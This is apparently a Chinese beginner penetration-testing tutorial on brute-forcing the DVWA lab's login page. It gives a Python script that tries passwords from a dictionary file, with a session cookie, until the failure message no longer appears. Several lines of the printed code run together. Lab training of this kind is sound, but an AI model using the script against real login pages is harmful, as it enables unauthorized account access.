当前位置: 首页 > news >正文

渗透测试入门学习——编写python脚本实现对网站登录页面的暴力破解

news 来源:原创 2024/9/29 15:57:00

进入靶场输入任意密码进行尝试

发现登陆失败的特征字:“Username and/or password incorrect”

推荐用谷歌浏览器,按F12继续查看请求地址、请求头参数等详细信息,着重关注是否需要Cookie

编写python脚本

import requests
# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=low; PHPSESSID=gcgc5dhp7ikcedlhojofijia44"
username = "admin"
# success为未知,但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"count = 0with open("./pswd.txt", 'r') as file:while True:# 按行读,避免用readlines()读取全部后导致占用太多内存line = file.readline()# 如果读到内容为空的行则结束if not line:break;# 每行结尾自带换行符需要去掉line = line.strip()# 发送请求count += 1response = requests.get(url = url,params = {"username":username, "password":line, "Login":"Login"},headers = {"Cookie":cookie})# 判断请求中有无特征字if failure in response.text:print("第"+ str(count) +"次尝试--失败:",line)else :print("第"+ str(count) +"次尝试--成功:",line)break;

准备字典

执行脚本

验证暴力破解的结果是否正确

相关文章:

  • Performance Analysis Kit简介
  • 江科大笔记—LED闪烁 LED流水灯 蜂鸣器
  • 【数据结构笔记】2-3-3 单链表的查找
  • Springboot3保存日志到数据库
  • 移动会议:气膜馆的理想选择—轻空间
  • 设计模式 策略模式(Strategy Pattern)
  • SWAP、AquaCrop、FVCOM、Delft3D、SWAT、R+VIC、HSPF、HEC-HMS......
  • 【JAVA高级】 redis分布式双重加锁(业务校验:防止接口并发调用时数据重复)
  • excel-VBA知识点记录
  • 享元(轻量级)模式
  • B样条(B-spline)函数
  • 如何更改 Ubuntu/Linux 终端中命令行提示符的颜色
  • (11)(2.1.2) DShot ESCs(四)
  • C++文件内容加解密
  • Unity3D Compute Shader同步详解
  • @angular/forms 源码解析之双向绑定
  • 【每日笔记】【Go学习笔记】2019-01-10 codis proxy处理流程
  • 10个确保微服务与容器安全的最佳实践
  • Android交互
  • CSS实用技巧干货
  • EOS是什么
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • Laravel核心解读--Facades
  • LeetCode18.四数之和 JavaScript
  • MySQL常见的两种存储引擎:MyISAM与InnoDB的爱恨情仇
  • PHP 使用 Swoole - TaskWorker 实现异步操作 Mysql
  • SegmentFault 社区上线小程序开发频道,助力小程序开发者生态
  • swift基础之_对象 实例方法 对象方法。
  • UEditor初始化失败(实例已存在,但视图未渲染出来,单页化)
  • 关于springcloud Gateway中的限流
  • 看图轻松理解数据结构与算法系列(基于数组的栈)
  • 你真的知道 == 和 equals 的区别吗?
  • 使用parted解决大于2T的磁盘分区
  • 手机端车牌号码键盘的vue组件
  • 提升用户体验的利器——使用Vue-Occupy实现占位效果
  • 因为阿里,他们成了“杭漂”
  • media数据库操作,可以进行增删改查,实现回收站,隐私照片功能 SharedPreferences存储地址:
  • ​io --- 处理流的核心工具​
  • ​LeetCode解法汇总2670. 找出不同元素数目差数组
  • ‌U盘闪一下就没了?‌如何有效恢复数据
  • #FPGA(基础知识)
  • #LLM入门|Prompt#1.7_文本拓展_Expanding
  • %3cscript放入php,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
  • (1)bark-ml
  • (1/2) 为了理解 UWP 的启动流程,我从零开始创建了一个 UWP 程序
  • (12)Hive调优——count distinct去重优化
  • (Java岗)秋招打卡!一本学历拿下美团、阿里、快手、米哈游offer
  • (二)Eureka服务搭建,服务注册,服务发现
  • (二刷)代码随想录第15天|层序遍历 226.翻转二叉树 101.对称二叉树2
  • (附源码)apringboot计算机专业大学生就业指南 毕业设计061355
  • (附源码)springboot炼糖厂地磅全自动控制系统 毕业设计 341357
  • (接口封装)
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (一)pytest自动化测试框架之生成测试报告(mac系统)
  • (转)Oracle 9i 数据库设计指引全集(1)